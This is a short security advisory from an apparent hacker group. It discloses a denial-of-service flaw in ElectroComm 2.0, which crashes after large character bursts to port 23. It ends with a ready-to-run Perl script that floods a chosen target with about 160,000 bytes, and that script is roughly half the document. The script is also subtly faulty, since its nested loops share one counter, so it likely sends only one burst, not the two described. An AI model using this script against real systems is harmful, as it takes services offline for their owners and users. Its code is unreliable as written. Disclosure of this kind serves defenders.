 [ Advisory for Electrocomm                        ]
 [ Electrocomm is made by Electrosoft              ]
 [ Site: http://www.esei.com                       ]
 [ by nemesystm of the DHC                         ]
 [ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
 [ ADV-0118                                        ]

/-|=[explanation]=|-\
ElectroComm allows you to connect to a comm port on
a computer over a network using any Telnet client.
The program can fall victim to a denial of service.

/-|=[who is vulnerable]=|-\
Electrocomm 2.0 has been tested to be vulnerable.
Prior versions are assumed to be vulnerable as well.

/-|=[testing it]=|-\
Sending two bursts of characters with a length of 
about 160000 each to port 23 will peg CPU to 100% 
and then crash with:
Run-time error '381':
Invalid array index.

I have made a perl script that exploits this. It is
at the bottom of this advisory.

/-|=[fix]=|-\
None known at the moment.

#!/usr/bin/perl
#
# EC.PL - Crashes ElectroComm 2.0 Server.
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - neme-dhc@hushmail.com
#
####
use Socket;

die "$0 - Crashes ElectroComm 2.0 Server.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

for ($count = 0; $count <= 2; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(23, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        if (connect (CLIENT, $serverAddr)) {
	        for ($count = 0; $count <= 160000; $count++) {
        	        send (CLIENT, "A",0);
                }
        } else { die "Can't connect.\n"; }

}
print "Done.\n";